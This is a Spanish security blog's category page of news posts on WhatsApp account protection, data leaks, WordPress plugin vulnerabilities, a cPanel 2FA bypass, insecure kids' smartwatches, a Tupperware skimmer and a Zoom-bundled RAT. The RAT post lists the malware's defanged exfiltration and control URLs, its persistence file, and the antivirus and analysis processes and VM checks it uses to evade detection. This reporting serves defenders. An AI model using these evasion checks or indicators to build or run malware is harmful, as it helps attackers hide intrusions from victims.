Archivos de la categoría: Blog

Cómo evitar robo de cuenta WhatsApp

Etiquetas:

Categoría: Seguridad Whatsapp

WhatsApp es una de las aplicaciones más usadas a nivel mundial. Eso es un incentivo para los ciberdelincuentes que ven en la mala configuración del mismo un incentivo para realizar distintas estafas robándonos la cuenta. Para evitar el mismo realizamos la siguiente guía de como evitar robo de cuenta whatsapp. WhatsApp nos brinda una capa más de seguridad que se llama verificación en dos pasos. Consiste de un número de 6 dígitos. A continuación muestro paso a paso como activarlo y configurarlo.

Presionamos en los 3 puntos que están sobre la derecha en la pestaña chat y nos abrirá un ventana en dónde seleccionaremos ajustes. Deberíamos llegar a esta imágen.

Presionamos donde dice cuenta y nos llevaría a las opciones de nuestra cuenta.

Una vez que seleccionemos Verificación en dos pasos nos mostrará esta ventana.

Presionamos en el botón verde debajo donde dice activar y nos llevará a una ventana nueva en donde debemos elegir un número de 6 dígitos. Opcionalmente nos da la opción de elegir un email en donde podremos recuperar también la cuenta. Aconsejo poner la misma que tenemos en nuestra cuenta android y también deberíamos tener un segundo factor de autenticación en la misma. Si es con huella dactilar mejor aún.

Una vez activada la opción veremos la siguiente imagen.

Con esa opción activada evitaremos que desde otros dispositivos nos puedan robar nuestra cuenta de WhatsApp.

Si tienes alguna duda o consulta sobre este post o algún otro tema, comenta en el formulario debajo y con gusto responderé. En mi blog comparto información, guías y demás consejos de ciberseguridad, ecommerce, etc.

Más de 300 millones de correos electrónicos y contraseñas filtradas, compruebe si su cuenta ha sido pirateada

Categoría: Google Información Seguridad

Muchos usuarios que fueron víctimas de piratería estaban usando la misma contraseña para Netflix y Google.

En otro ciberataque importante, un foro de piratería en línea ha afirmado que ha filtrado más de 300 millones de correos electrónicos y contraseñas.

Las credenciales comprometidas pertenecen a usuarios de LinkedIn, Minecraft, Netflix, Badoo, Pastebin y Bitcoin. Significativamente, muchos usuarios que fueron víctimas de piratería estaban usando la misma contraseña para Netflix y Google.

El foro de piratería en línea también ha afirmado que los datos de todas estas cuentas se guardan en un solo lugar.

Según un informe de CyberNews, estas filtraciones de datos se han producido desde plataformas como Netflix, LinkedIn y Bitcoin. Esta fuga de datos se llama «Compilación de muchas infracciones». Según la información, los datos filtrados se han guardado en un lugar en un contenedor protegido con contraseña.

A principios de 2017, se filtraron datos a más de 100 millones de personas. Se filtraron datos de query.sh, sorter.sh y count-total.sh. Se dice que esta fuga de datos también es similar a la del año 2017.

En ese momento, los datos de más de 100 millones de millones de personas se filtraron en texto sin formato.

En primer lugar, debe cambiar su contraseña de inmediato. Aparte de esto, puede verificar si sus datos se han filtrado o están seguros visitando haveibeenpwned.com y el sitio web cybernews.com/personal-data-leak-check.

Si necesita ayuda o no sabe como operar con varias contraseñas distintas me pueden contactar y con gusto los ayudaré a elegir un buen gestor de contraseñas y les ayudaré a utilizarlo. Activar el segundo factor de autenticación siempre que podamos es una mejora a nuestra seguridad también.

Recuerden que nuestra información es lo mas valioso que podemos tener. Una filtración de datos no es simplemente texto.

Fuente: https://www.dnaindia.com/

Plugin de WordPress sin actualizar afecta a mas de 50000 sitios webs (Contact Form 7)

Categoría: Seguridad Wordpress

Un error de seguridad de CRSF a XSS almacenado afecta a mas de 50.000 usuarios del estilo «Formulario de contacto 7».

Un error de seguridad en Contact Form 7 Style, un complemento de WordPress instalado en más de 50.000 sitios, podría permitir la inyección maliciosa de JavaScript en un sitio web de la víctima.

La última vulnerabilidad de seguridad del complemento de WordPress es una falsificación de solicitud entre sitios (CSRF) a un problema de scripts entre sitios almacenados (XSS) en Contact Form 7 Style, que es un complemento del conocido complemento general Contact Form 7.

Ocupa un 8,8 sobre 10 en la escala de vulnerabilidad-gravedad de CVSS (CVE está pendiente). CSRF permite que un atacante induzca a un usuario víctima a realizar acciones que no es su intención. XSS permite a un atacante ejecutar JavaScript arbitrario dentro del navegador de un usuario víctima. Este error conecta los dos enfoques.

Los investigadores de Wordfence dijeron que aún no hay ningún parche disponible y que las versiones 3.1.9 y anteriores se ven afectadas. WordPress eliminó el complemento del repositorio de complementos de WordPress el 1 de febrero.

Formulario de contacto vulnerable 7 estilo Contact Form 7 se utiliza para crear, como su nombre indica, formularios de contacto utilizados por sitios web. El estilo vulnerable Contact Form 7 es un complemento que se puede utilizar para agregar detalles adicionales a los formularios que se crean con Contact Form 7. Para ello, permite a los usuarios personalizar el código de hojas de estilo en cascada (CSS) de un sitio, que se utiliza para dictar la apariencia de los sitios web basados ​​en WordPress. Aquí es donde radica la vulnerabilidad, según los investigadores de Wordfence. «Debido a la falta de desinfección y la falta de protección nonce en esta función, un atacante podría crear una solicitud para inyectar JavaScript malicioso en un sitio usando el complemento», explicaron, en una publicación de esta semana, agregando que se retendrán más detalles. para dar a los propietarios del sitio la oportunidad de abordar el problema. «Si un atacante engañaba con éxito al administrador de un sitio para que hiciera clic en un enlace o archivo adjunto, entonces la solicitud podría enviarse y la configuración de CSS se actualizaría correctamente para incluir JavaScript malicioso».

Dado que la cantidad de instancias instaladas para el complemento es tan alta, debido a la cantidad de sitios afectados por el cierre de este complemento, proporcionamos intencionalmente detalles mínimos sobre esta vulnerabilidad para brindar a los usuarios tiempo suficiente para encontrar una solución alternativa.

Es posible que proporcionemos detalles adicionales más adelante a medida que continuamos monitoreando la situación. Para explotar la falla, los ciberataques tendrían que convencer a un administrador que haya iniciado sesión para que haga clic en un enlace malicioso, lo que se puede hacer a través de cualquiera de los enfoques comunes de ingeniería social (es decir, a través de un correo electrónico fraudulento o mensaje instantáneo).

Wordfence notificó al desarrollador del complemento sobre el error a principios de diciembre; Después de no recibir respuesta, los investigadores elevaron el problema al equipo de complementos de WordPress a principios de enero. El equipo de complementos de WordPress también se puso en contacto con el desarrollador sin respuesta, lo que llevó a la divulgación esta semana.

Cómo protegerse contra la inyección maliciosa de JavaScript Debido a que, al igual que con todas las vulnerabilidades de CSRF, el error solo se puede aprovechar si un usuario administrador realiza una acción mientras está autenticado en el sitio vulnerable de WordPress, los administradores siempre deben tener cuidado al hacer clic en cualquier enlace. «Si cree que debe hacer clic en un enlace, le recomendamos que utilice ventanas de incógnito cuando no esté seguro acerca de un enlace o archivo adjunto», según Wordfence. «Esta precaución puede proteger su sitio de ser explotado con éxito por esta vulnerabilidad junto con todas las demás vulnerabilidades de CSRF».

En este caso, los usuarios también deben desactivar y eliminar el complemento Contact Form 7 Style y buscar un reemplazo, agregaron los investigadores, ya que parece que no habrá ningún parche.

Vulnerabilidad critica en plugin Contact Form 7 permite tomar control de sitios WordPress

Categoría: Seguridad Wordpress

Se recomienda a quienes utilicen el plugin Contact Form 7 que actualicen a la versión 5.3.2 lo antes posible para mayor seguridad.

Contact Form 7 es un popular plugin activo en más de 5 millones de sitios de WordPress que fue actualizado el día de ayer a la versión 5.3.2. Esta actualización incluye un parche que corrige una vulnerabilidad severa, del tipo Unrestricted File Upload, que permitiría a un atacante realizar varias acciones maliciosas, incluso tomar el control de un sitio o de todo el servidor que aloja el sitio.

Este conocido plugin para WordPress es utilizado para añadir formularios de contacto en un sitio y gestionar los contactos que dejan los usuarios tras completar el formulario.

La vulnerabilidad, clasificada como CVE-2020-35489, afecta a la versión 5.3.1 y anteriores del plugin. De hecho, se estima que cerca del 70% de los usuarios activos de Contact Form 7 están expuestos a este fallo.

Los responsables del hallazgo fueron investigadores de la firma Astra, quienes reportaron el fallo a los desarrolladores del plugin que rápidamente corrigieron la vulnerabilidad con la actualización a la versión 5.3.2.

La vulnerabilidad permite evadir cualquier restricción de formato de archivo por parte de Contact Form y que un atacante pueda subir un ejecutable malicioso en un sitio que tenga habilitada la función de subir archivos y que corra una versión desactualizada del plugin. Esto permitiría al atacante realizar varias acciones, como inyectar un script malicioso en un sitio, tomar el control del mismo o realizar un defacement.

Se recomienda a los propietarios o administradores de sitios que utilicen este plugin que instalen la última actualización cuanto antes.

Adios a Flash! Si estás usándolo, desinstalalo.

Categoría: Información Seguridad

Es hora de decirle un último «adiós» a Flash.

(¿O debería ser «Buen viaje»?)

Dado que a principios de esta semana se vio el lanzamiento final programado de Flash Player, Adobe ha confirmado que ya no admitirá el software después del 31 de diciembre de 2020 y bloqueará activamente la ejecución del contenido Flash dentro de Flash Player a partir del 12 de enero de 2021.

En las propias palabras de la empresa, «recomienda encarecidamente a todos los usuarios que desinstalen Flash Player inmediatamente para proteger sus sistemas».

Cualquiera que todavía esté ejecutando Flash Player puede esperar comenzar a ver notificaciones emergentes en su pantalla de que la muerte del software está a solo unos días y que deben desinstalar el software.

La desaparición de Flash no debería ser una sorpresa, ha estado en las cartas durante años. Y no es solo Adobe el que ha estado trabajando duro para acabar con él de manera elegante. Empresas como Apple, Google, Microsoft y Mozilla detuvieron la reproducción de Flash en sus navegadores hace años y se han comprometido a eliminar por completo cualquier código restante relacionado con Flash para fines de 2020.

¿Por qué tan poco amor por Flash?

Bueno, una razón es que los hábiles estándares abiertos, como HTML5, WebGL y WebAssembly, han ganado popularidad desde que Flash estaba en su apogeo, pero la razón más apremiante es asegurar y proteger mejor a los usuarios de Internet.

Flash ha tenido un historial accidentado a lo largo de los años, y los piratas informáticos malintencionados suelen explotar los agujeros de seguridad para infectar los equipos de los usuarios. Además, las actualizaciones falsas de Adobe Flash han sido un disfraz comúnmente implementado para aquellos que intentan engañar a los navegantes para que descarguen malware en sus PC.

Un mundo posterior a Flash parece un lugar más seguro para estar.

Pero si deja Flash en su computadora, hay un problema. Ese es un código que Adobe no tiene previsto actualizar nunca y que, potencialmente, podría ser explotado por los ciberdelincuentes en el futuro. Es mejor, dado que no va a tener ningún uso para él en el futuro, para eliminarlo.

Por lo tanto, no pierdas el tiempo. Diga adiós y desinstale Adobe Flash.

Haga clic en «Desinstalar» cuando se lo solicite Adobe Flash Player, o siga las instrucciones de desinstalación manual para las versiones de Flash para Windows y Mac.

La omisión de 2FA en cPanel potencialmente expone a decenas de millones de sitios web a ser hackeados

Categoría: Blog Información Seguridad

Se descubrio un Bypass 2FA en el software de alojamiento web cPanel. Más de 70 millones de sitios se administran a través del software cPanel, según la compañía. Los investigadores descubrieron un problema importante en cPanel que los atacantes podrían aprovechar para evitar la autenticación de dos factores para las cuentas de cPanel.

Los investigadores de seguridad de Digital Defense han descubierto un problema de seguridad importante en cPanel, un popular paquete de software que facilita la administración de un servidor de alojamiento web. Los atacantes podrían aprovechar la falla para eludir la autenticación de dos factores (2FA) para las cuentas de cPanel y administrar los sitios web asociados. «Digital Defense, Inc., líder en soluciones de gestión de amenazas y vulnerabilidades, anunció hoy que su equipo de investigación de vulnerabilidades (VRT) descubrió una vulnerabilidad no revelada anteriormente que afecta a la plataforma de alojamiento web cPanel & WebHost Manager (WHM)».

“La versión 11.90.0.5 de c_Panel & WHM (90.0 Build 5) exhibe una falla de autenticación de dos factores, vulnerable al ataque de fuerza bruta, lo que resulta en un escenario en el que un atacante con conocimiento o acceso a credenciales válidas podría eludir las protecciones de autenticación de dos factores en una cuenta.» La falla podría tener un impacto dramático porque los proveedores de alojamiento web utilizan actualmente el paquete de software para administrar más de 70 millones de dominios en todo el mundo. Los expertos descubrieron que la implementación de 2FA del software cPanel & WebHost Manager (WHM) era vulnerable a los ataques de fuerza bruta que permitían a los atacantes adivinar parámetros de URL y omitir 2FA.

La explotación de este error requiere que los atacantes tengan credenciales válidas para una cuenta objetivo. “La política de seguridad de cPanel de autenticación de dos factores no evitó que un atacante enviara repetidamente códigos de autenticación de dos factores. Esto permitió a un atacante evitar la verificación de autenticación de dos factores utilizando técnicas de fuerza bruta «. lee un aviso de seguridad publicado por la empresa.

«La validación fallida del código de autenticación de dos factores ahora se trata como equivalente a una falla en la validación de la contraseña principal de la cuenta y la tasa limitada por cPHulk». Los investigadores agregaron que los atacantes podrían eludir el 2FA en unos minutos. Este problema se solucionó con el lanzamiento de las siguientes compilaciones: 11.92.0.2
11.90.0.17
11.86.0.32

Los administradores de sitios web instan a verificar si su proveedor de alojamiento ha actualizado su instalación de cPanel.

Millones de Datos Sensibles Expuestos en Servidor Mal Configurado

Categoría: Información Seguridad

La indebida configuración de un servidor en la nube perteneciente a una popular plataforma de reservas expuso de manera pública información personal de millones de huéspedes, como nombres completos, números de identificación nacional y datos de tarjetas de crédito.

Una gran cantidad de información sensible, perteneciente a millones de huéspedes de hoteles de distintas partes del mundo y alojada en un servidor mal configurado, quedó expuesta al alcance de cualquier persona. Los datos estaban almacenados en un bucket de Amazon Web Services (AWS) S3 perteneciente a Prestige Software, una empresa con sede en España que vende software de gestión hotelera.

La exposición de esta información, reportada por Website Planet, se originó en el software Channels Manager de la empresa española, el cual es utilizado por los hoteles para automatizar el estado de sus vacantes en varios sitios web para la reserva de alojamiento. En este sentido, dado que la plataforma se utiliza para conectarse con los sitios web de reservas, algunos de los datos provienen conocidas agencias de viajes online, como pueden ser Expedia, Booking.com y Agoda, entre otras tantas más, aunque es importante mencionar que no son culpables por la exposición de los datos.

En total los datos comprendían más de 10 millones de archivos de registro, incluida información que se remonta al año 2013. Entre los datos había una gran cantidad de información de identificación personal (PII), como los nombres completos de los huéspedes, números de identificación nacional, direcciones de correo electrónico, números de teléfono, así como detalles como el número de reserva, fechas, número de invitados y sus nombres, y el precio pagado. Además, el bucket S3 también contenía datos financieros valiosos, como números de tarjetas de crédito, el nombre del titular de la tarjeta, códigos de verificación de la tarjeta de crédito (CVV) y fecha de vencimiento.

Website Planet también confirmó la veracidad de los datos al verificar que una muestra de las direcciones de correo electrónico filtradas pertenecía a personas reales. Si bien actualmente no hay evidencia de que ningún actor malintencionado haya obtenido acceso a los datos expuestos, los investigadores no pueden garantizar que nadie haya accedido a los datos previo a ser descubierto el servidor mal configurado. Los investigadores también se pusieron en contacto con Amazon Web Services y desde entonces los datos se aseguraron correctamente.

La cantidad y variedad de registros expuestos ofrece a los cibercriminales material que puede ser utilizado para realizar todo tipo de actividad maliciosa. Los huéspedes del hotel podrían ser víctimas de robo de identidad, ataques de phishing y de otros tipos de ataque de ingeniería social, e incluso de fraude financiero debido a la exposición de datos de tarjetas de crédito. Sin embargo, los cibercriminales no tienen porque abusar de los datos ellos mismos; ya que pueden vender esta información a granel en la dark web.

Las empresas que incumplan las leyes de protección de datos, en particular el Reglamento general de protección de datos (GDPR) de la Unión Europea, pueden enfrentar graves consecuencias por fallas en la privacidad y la seguridad.

Fuente: WeLiveSecurity

Vulnerabilidades críticas en varios relojes inteligentes para niños

Categoría: Seguridad

Estudio reveló la existencia de vulnerabilidades en seis relojes inteligentes para niños que en algunos casos permitirían extraer datos sensibles, tomar el control del dispositivo y hasta monitorear remotamente sus funcionalidades.

Investigadores de la Universidad de Ciencias Aplicadas de Münster en Alemania publicaron recientemente los resultados de una investigación sobre la seguridad de relojes inteligentes para niños de seis marcas diferentes, en la que descubrieron múltiples fallos de seguridad críticos que podrían ser explotados por actores malintencionados. Tal como explica un artículo publicado por Wired, los dispositivos analizados están diseñados para enviar y recibir mensajes de voz y de texto, y permiten a los padres rastrear la ubicación de sus hijos desde una app en sus teléfonos. Sin embargo, tras las pruebas realizadas descubrieron vulnerabilidades que permitirían a un atacante aprovecharse de esas funciones para monitorear la ubicación de los niños a partir del GPS de cinco de las seis marcas analizadas. Por si fuera poco, “descubrieron otras vulnerabilidades aún más severas y que permitirían a un atacante enviar mensajes de texto y voz a los niños, interceptar los mensajes entre padres e hijos, y grabar audio del entorno de los más pequeños”, explica el artículo.

Las marcas de los modelos de relojes inteligentes analizados son Starlian, JBC, Polywell, Pingonaut, ANIO, y Xplora. Esta no es la primera vez que se descubren fallas de seguridad en dispositivos IoT para los más chicos. En 2016, por ejemplo, investigadores descubrieron vulnerabilidades en peluches de Fisher-Price y en el reloj GPS hereO que exponían datos y la ubicación de los usuarios, mientras que en 2017, el Consejo de Consumidores de Noruega reveló en un estudio realizado también en relojes inteligentes para niños, la existencia de importantes fallas de seguridad. Las vulnerabilidades descubiertas en este caso en particular fueron reportadas a los fabricantes y muchas de ellas fueron corregidas, aunque algunas todavía no.

En el caso de los dispositivos inteligentes de los fabricantes JBC, Polywell, ANIO, y Starlian, los mismos utilizan una arquitectura de hardware y de backend común que tiene detrás al mismo fabricante, que es una compañía de china llamada 3G Electronics. Según explican los investigadores, tras realizar pruebas en los relojes de estas cuatro marcas descubrieron que las comunicaciones con el servidor (que envía y recibe información entre el dispositivo y la app instalada en los teléfonos de los padres) no eran cifradas ni contaban con mecanismos de autenticación. En este sentido, dado que cada uno de estos relojes inteligentes viene con un IMEI que funciona como identificador único, un atacante con este identificador puede aprovechar estas fallas para alterar la comunicación enviada desde el reloj al servidor y modificar la información sobre la localización, pero también puede espiar las comunicaciones al grabar sonido a través del reloj inteligente e incluso enviar un mensaje de voz haciendo creer al padre o la madre que es enviado desde el dispositivo de su hijo.

El ANIO4 touch presenta fallos de autenticación en la comunicación con el servidor que permitirían a un atacante que logre conectarse al servidor utilizando credenciales de inicio de sesión legítimas, falsear su identidad para enviar comandos haciéndose pasar por otro usuario. Asimismo, esto permitiría al atacante obtener información de localización e interceptar o suplantar la identidad de alguien mediante mensajes de texto o de audio, explica el medio. Algo de similares características ocurre con el reloj inteligente de Pingonat, más específicamente el Panda 2, que la falta de cifrado en sus comunicaciones con el servidor permitieron a los investigadores interceptar mensajes y alterar los datos de ubicación.

Las fallas de seguridad responsabilidad de 3G Electronics fueron reparadas, así como también las vulnerabilidades en los relojes de JBC y Polywell. En el caso de los relojes del fabricante Starlian aún siguen existiendo fallos reportados. En el caso del Panda 2, los fabricantes dijeron a los investigadores que añadirían cifrado TLS para asegurar las comunicaciones de sus nuevos modelos.

Algunos de los relojes analizados presentan fallos a corregir pero que no son vulnerabilidades críticas, como es en el caso del modelo Panda 2 de Pingonaut. Algo similar ocurrió con XPLORA GO, en el que no encontraron fallos críticos. Sin embargo, en el caso de ANIO4 Tocuch, por ejemplo, la falta de implementaciones de seguridad es importante.

Como muchos lectores saben, la seguridad en dispositivos IoT es un problema desde hace ya un tiempo genera preocupación. Algunos de las fallas presentadas en este estudio ya fueron detectadas en estudios previos, como el que realizó en 2017 el Consejo de Consumidores de Noruega y que reveló la existencia de importantes fallas de seguridad en relojes inteligentes para niños. Sin embargo, esto no provocó que los fabricantes realizaran análisis de seguridad más profundos en sus productos. Esto demuestra la necesidad de seguir trabajando en pos de que se mejore la implementación de la seguridad en dispositivos inteligentes, por ejemplo, a través de medidas impulsadas por las autoridades.

Fuente: https://www.welivesecurity.com/

Se filtraron 300000 números de Whatsapp. Fijate si el tuyo aparece? – Corregido

Categoría: Whatsapp

¿Cómo saber si su número de WhatsApp se filtró en las búsquedas de Google?

Debido a un incidente de seguridad, el servicio de mensajería filtró más de 300.000 números de teléfono dejando «abierta la puerta a todo tipo de estafas y ciberataques». Compruebe si el suyo está o no.

Aunque para muchos WhatsApp parecer ser una red confiable, debido a un incidente de seguridad se filtraron los números de teléfono de más de 300.000 usuarios de la red de mensajería. El error fue descubierto por Athul Jayaram, un investigador experto en ciberseguridad, quien aseguró que la equivocación deja «abierta la puerta a todo tipo de estafas y ciberataques».

El culpable del error sería la opción que permite a los usuarios conversar por el sitio web del servicio de mensajería. A través de WhatsApp Web muchos utilizan “Click to Chat” para iniciar una conversación con un número de teléfono que no tienen guardado entre sus contactos, y que se utiliza en especial en las páginas de soporte o ventas online.

Además, con esta función los usuarios pueden crear enlaces URL o códigos QR, pero lo que pocos conocen es que de esta forma también se están indexando sus números en la base de datos de Google, dejando su información personal al alcance de todos.

Para saber si su número está en la base de datos que se filtró a Google basta con ingresar a su buscador predeterminado y escribir «site:wa.me “+54 xxx xx xx xx”, sustituyendo las equis por su número celular. Al dar buscar, si sus datos aparecen de inmediato quiere decir que el número fue filtrado, de lo contrario no quedó en esta base de datos.

Los expertos recomiendan que para mayor seguridad es necesario evitar el uso de la función «Click to Chat», si se quiere mantener el número fuera de las búsquedas de Google. Pero si usted ya tiene activada la herramienta, se recomienda eliminar los enlaces de «Click to Chat» de los sitios web de acceso público. 

Estos no son los únicos errores de seguridad que han cometido las redes sociales, a pesar de que varias sugerencias se han hecho a Facebook, Google y WhatsApp, ninguna compañía ha implementado medidas para mantener privados y seguros los datos de sus usuarios.

Update: El bug fue encontrado el dia 7 de Junio y el dia 9 de Junio fue corregido. No aceptes llamadas o mensajes de whatsapp de numeros que no aparezcan en tu lista de contactos.

Vulnerabilidad XSS en complemento de plugin de WordPress

Categoría: Seguridad Wordpress

Una vulnerabilidad de scripts de sitios cruzados (XSS) autenticada podría permitir a los atacantes crear administradores deshonestos en sitios de WordPress utilizando el complemento Contact Form 7 Datepicker

Se recomienda a los administradores de sitios de WordPress que utilicen el complemento Contact Form 7 Datepicker que lo eliminen o desactiven para evitar que los atacantes exploten una vulnerabilidad almacenada de scripts entre sitios (XSS) para crear administradores deshonestos o hacerse cargo de las sesiones de administración.

El Form Contact Form 7 Datepicker ‘es un software de código abierto que permite agregar un campo de fecha a la interfaz de usuario del complemento Contact Form 7 WordPress, que es un complemento de administración de formularios de contacto utilizado actualmente en más de 5 millones de sitios web. El complemento se instaló en más de 100k sitios de WordPress utilizando el complemento Contact Form 7 Datepicker. La falla fue descubierta por investigadores del equipo de Wordfence Threat Intelligence.

«El 1 de abril de 2020, el equipo de Wordfence Threat Intelligence descubrió una vulnerabilidad almacenada de Cross Site Scripting (XSS) en Contact Form 7 Datepicker, un complemento de WordPress instalado en más de 100,000 sitios». informó el análisis publicado por WordFence. «Como la página github del desarrollador del complemento indicó que el complemento ya no se mantenía, contactamos al equipo de complementos de WordPress con nuestra divulgación, e inmediatamente eliminaron el complemento del repositorio para su revisión. «

El complemento se cerró el 1 de abril de 2020 y ya no está disponible para descargar. Sus colaboradores y desarrolladores confirmaron que ya no se mantendrá y se eliminará definitivamente del repositorio de WordPress.

El complemento Contact Form 7 Datepicker permite a los usuarios agregar un selector de fechas a los formularios generados por Contact Form 7. El complemento también permite a los usuarios modificar la configuración de estos datepickers.

“Para procesar esta configuración, registró una acción AJAX que llama a una función que no pudo incluir una verificación de capacidad o una verificación nonce. Como tal, era posible que un atacante conectado con permisos mínimos, como un suscriptor, enviara una solicitud diseñada que contenía JavaScript malicioso que se almacenaría en la configuración del complemento «. continúa el análisis

«La próxima vez que un usuario autorizado cree o modifique un formulario de contacto, el JavaScript almacenado se ejecutará en su navegador, que podría usarse para robar la sesión de un administrador o incluso crear usuarios administrativos maliciosos».

Los administradores de sitios web que usan el complemento defectuoso deben buscar una alternativa para usar en sus sitios web.

Desafortunadamente, el número de ataques que intentan explotar vulnerabilidades en los complementos de WordPress continúa aumentando.

Hace unas semanas, los investigadores de NinTechNet informaron sobre una campaña en curso que explotaba activamente una falla de día cero en los campos de pago flexible de WordPress para el complemento WooCommerce. Otros ataques observados recientemente son:

  • Enero de 2020: una vulnerabilidad de omisión de autenticación en el complemento InfiniteWP que podría afectar a más de 300,000 sitios.
  • Enero de 2020: más de 200 000 sitios de WordPress están expuestos a ataques debido a un error de falsificación de solicitudes entre sitios (CSRF) de alta gravedad en el complemento de fragmentos de código.
  • Febrero de 2020: se puede explotar una falla grave en el plugin de ThemeGrill Demo Importer WordPress con más de 200,000 instalaciones activas para borrar sitios y obtener acceso de administrador al sitio.
  • Febrero de 2020: una vulnerabilidad almacenada entre sitios en el complemento GDPR Cookie Consent que podría afectar a 700K usuarios.
  • Febrero de 2020: los hackers en la naturaleza explotaron activamente una vulnerabilidad de día cero en los complementos ThemeREX para crear cuentas de usuario con permisos de administrador.
  • Marzo de 2020: el complemento de WordPress «Complementos ThemeREX» se ve afectado por una vulnerabilidad crítica que podría permitir a los atacantes remotos ejecutar código arbitrario.
  • Marzo de 2020: las fallas en el complemento de WordPress Builder Builder podrían permitir a atacantes no autenticados inyectar código JavaScript malicioso en ventanas emergentes de más de 100K sitios web.
  • Marzo de 2010: un defecto crítico de escalada de privilegios en el complemento SEO de WordPress: el complemento Rank Math puede permitir a los usuarios registrados obtener privilegios de administrador.

Creo que es muy importante proteger la instalación de WordPress con soluciones dedicadas, y contar con desarrolladores especializados en ciberseguridad. Si usted necesita asesoramiento no dude en consultarme y le responderé a la brevedad.

El sitio web de Tupperware, fue infectado con un skimmer de tarjetas de pago.

Categoría: Magento

Los piratas informáticos han comprometido el sitio web del popular vendedor de productos de envases de alimentos de plástico Tupperware que implanta un skimmer de tarjeta de pago utilizado para robar los detalles de la tarjeta de pago de los clientes. El sitio web oficial tiene aproximadamente 1 millón de visitas mensuales en promedio.

El código malicioso también se descubrió en algunas versiones localizadas del sitio web oficial de Tupperware.

Según analisis, el código malicioso permaneció activo en la página de inicio de Tupperware durante al menos cinco días, los expertos descubrieron el código malicioso el 20 de marzo.

Los investigadores intentaron notificar a Tupperware sin éxito.

Según los expertos, el código malicioso en el sitio web de Tupperware funciona imitando el formulario de pago oficial de la compañía.

“Durante uno de los rastreos web, identificó un iframe de aspecto sospechoso cargado desde deskofhelp [.] Com cuando visitamos la página de pago en tupperware [.] Com. Este iframe es responsable de mostrar los campos del formulario de pago presentados a los compradores en línea «.

La inspección de la página de pago reveló la presencia de un iframe diseñado para mostrar un formulario de pago clonado que imita el formulario de pago legítimo VISA CyberSource implementado en el sitio de Tupperware.

El formulario falso recopila datos de pago ingresados ​​por los usuarios y los envía a un servidor remoto bajo el control de los atacantes. El código malicioso roba nombre y apellido, dirección de facturación, número de teléfono, número de tarjeta de crédito, fecha de vencimiento de la tarjeta de crédito y código CVV de la tarjeta de crédito.

«Los delincuentes idearon su ataque de skimmer para que los compradores primero ingresen sus datos en el iframe falso y luego se les muestre inmediatamente un error, disfrazado como un tiempo de espera de sesión». continúa el análisis

“Esto permite que los actores de la amenaza recarguen la página con el formulario de pago legítimo. Las víctimas ingresarán su información por segunda vez, pero para entonces, el robo de datos ya ha sucedido «.

Tupperware abordó el problema, ahora el formulario de pago se está cargando desde el dominio legítimo cybersource.com. Los expertos especulan que el sitio web fue pirateado porque estaba ejecutando una versión desactualizada de Magento e-commerce CMS.

«No sabemos exactamente cómo fue pirateado Tupperware, pero un escaneo a través de SiteCheck de Sucuri muestra que pueden estar ejecutando una versión desactualizada del software Magento Enterprise».

“Como cualquier compromiso del sitio web, es importante buscar la causa raíz al inspeccionar los registros del lado del servidor y determinar si los atacantes aún tienen acceso. Muchas veces, los delincuentes abandonan las puertas traseras de PHP o simplemente pueden volver a explotar la misma vulnerabilidad para volver a entrar »

Según los expertos, se espera que los ataques al estilo Magecart aumenten en los próximos meses, los piratas informáticos intentarán monetizar el aumento significativo en el número de compras en línea debido al brote de COVID19.

Malware de control remoto empaquetado en instaladores de Zoom

Categoría: Seguridad Zoom

Investigadores de TrendMicro han encontrado una familia de troyanos de control remoto (RAT) distribuidos junto con instaladores legítimos de Zoom.

El confinamiento por la pandemia del coronavirus ha disparado el uso de aplicaciones de videoconferencia como Zoom. El perfil de sus usuarios es muy variado y algunos menos técnicos son un punto flaco que ciberdelincuentes aprovechan para llevar a cabo sus ataques.

Zoom ya ha sido el objetivo de atacantes e investigadores de seguridad que han aprovechado y descubierto varias vulnerabilidades en este período de confinamiento.

En este caso no se trata de un fallo de seguridad en el programa, sino un esquema de ataque mucho más simple que utiliza la popularidad del software como cebo: los ciberdelincuentes distribuyen instaladores de Zoom legítimos empaquetados junto con un «backdoor» que permite controlar de forma remota al equipo infectado.

Este troyano ha sido bautizado por los investigadores como «RevCode WebMonitor RAT (Backdoor.Win32.REVCODE.THDBABO)». Y permite tomar el control de la máquina que ha sido infectada:

  • Añadir, borrar o modificar ficheros e información del registro.
  • Cerrar conexiones bajo demanda.
  • Exfiltrar información sobre el software o el hardware de la máquina.
  • Tomar capturas de la webcam del dispositivo.
  • Grabar audio y pulsaciones de teclado.
  • Iniciar, suspender o terminar procesos o servicios.
  • Retransmitir en directo la pantalla de la víctima.
  • Conectar o desconectar el WiFi.

Para asegurar su persistencia se instala el fichero «Zooom.vbs» en la carpeta de inicio del usuario, lo que permite la ejecución del malware al inicio del sistema. Siempre y cuando no se detecte ningún indicio de que hay un analista intentando descubrir sus mecanismos. Para ello comprueba la presencia de procesos como:

  • aswidagent.exe
  • avastsvc.exe
  • avastui.exe
  • avgsvc.exe
  • avgui.exe
  • avp.exe
  • bdagent.exe
  • bdwtxag.exe
  • dwengine.exe
  • mpcmdrun.exe
  • msmpeng.exe
  • nissrv.exe
  • ollydbg.exe
  • procexp.exe
  • procexp64.exe
  • procmon.exe
  • procmon64.exe
  • windbg.exe

Y finaliza su ejecución en caso de encontrar alguno. No solo eso, también se comprueba si el entorno en el que se está ejecutando se trata de una máquina virtual:

  • Kernel-based Virtual Machine
  • Microsoft Hypervisor
  • Parallels Hypervisor
  • VirtualBox
  • VMware
  • Xen Virtual Machine Manager

O si encuentra ficheros de nombre similar a alguno de los siguientes:

  • Malware
  • Sample
  • Sandbox

Todo esto complica el análisis a un experto y lo hace indetectable para el usuario con menos experiencia.

La víctima ejecutará una instalación legítima de Zoom que funcionará de la forma habitual. Sin embargo en este punto su máquina ya habrá sido comprometida.

Las muestras analizadas por TrendMicro enviaban la información de la víctima a través de peticiones HTTP POST a la URL hxxps://213.188.152.96/recv7[.]php y utilizaban la URL dabmaster[.]wm01[.]to y barclaysb[.]wm01[.]to como servidor de control y comando.

Al parecer los instaladores de Zoom fraudulentos han estado distribuyéndose utilizando enlaces de Bit.ly: https://bitly[.]com/31r0api.

Una garantía para estar protegidos es descargar el software siempre de fuentes oficiales, en este caso https://zoom.us/download.

Fuente: Una al dia

Expertos descubren robo en WooCommerce

Categoría: JQuery Seguridad Wordpress

Los expertos descubrieron un nuevo e-skimmer empleado en ataques MageCart contra sitios web de WordPress utilizando el complemento WooCommerce.

